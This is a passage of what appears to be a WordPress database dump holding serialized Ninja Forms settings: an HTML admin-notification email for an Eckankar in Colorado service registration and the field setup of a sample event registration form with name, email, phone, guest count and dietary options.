style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New                                ELSS Web                                Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new ELSS registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>  \";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:185;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-05-04 10:48:03\";s:5:\"label\";s:16:\"Store Submission\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}s:2:\"id\";i:183;}}s:8:\"settings\";a:34:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:40:\"ECK Light and Sound Service Registration\";s:10:\"created_at\";s:19:\"2021-05-04 10:48:03\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:7:{i:0;s:54:\"eck_light_and_sound_service_registration_1620150522553\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(47,'a:4:{s:2:\"id\";i:47;s:6:\"fields\";a:13:{i:0;a:2:{s:8:\"settings\";a:14:{s:4:\"type\";s:4:\"html\";s:3:\"key\";s:23:\"event_intro_description\";s:5:\"label\";s:23:\"Event Intro Description\";s:5:\"order\";s:1:\"1\";s:10:\"editActive\";s:0:\"\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"objectType\";s:5:\"Field\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:240:\"<p>If you would like to take part in our event, please fill in your details in this Event Registration Form below and you will be automatically registered. Event registration must be completed at least seven (7) days prior to the event.</p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:23:\"Event Intro Description\";s:9:\"field_key\";s:23:\"event_intro_description\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:430;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"2\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:431;}i:2;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:432;}i:3;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"4\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:433;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"5\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:434;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"6\";s:5:\"label\";s:5:\"Phone\";s:3:\"key\";s:7:\"textbox\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:435;}i:6;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"7\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_1\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_1\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:436;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"8\";s:5:\"label\";s:38:\"How many friends will you bring along?\";s:3:\"key\";s:37:\"how_many_friends_will_you_bring_along\";s:4:\"type\";s:10:\"listselect\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:5:{i:0;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"None\";s:5:\"value\";s:4:\"none\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:4;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:4:\"Four\";s:5:\"value\";s:4:\"four\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:38:\"How many friends will you bring along?\";s:9:\"field_key\";s:37:\"how_many_friends_will_you_bring_along\";s:9:\"parent_id\";s:2:\"47\";}s:2:\"id\";i:437;}i:8;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:5:\"order\";s:1:\"9\";s:5:\"label\";s:22:\"Any food requirements?\";s:3:\"key\";s:21:\"any_food_requirements\";s:4:\"type\";s:9:\"listradio\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Vegan\";s:5:\"value\";s:5:\"vegan\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Vegitarian\";s:5:\"value\";s:10:\"vegetarian\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";s:1:\"0\";}}}}i:2;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:11:\"Gluten Free\";s:5:\"value\";s:9:\"no-gluten\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";s:0:\"\";s:15:\"hide_merge_tags\";s:0:\"\";s:5:\"error\";s:0:\"\";s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 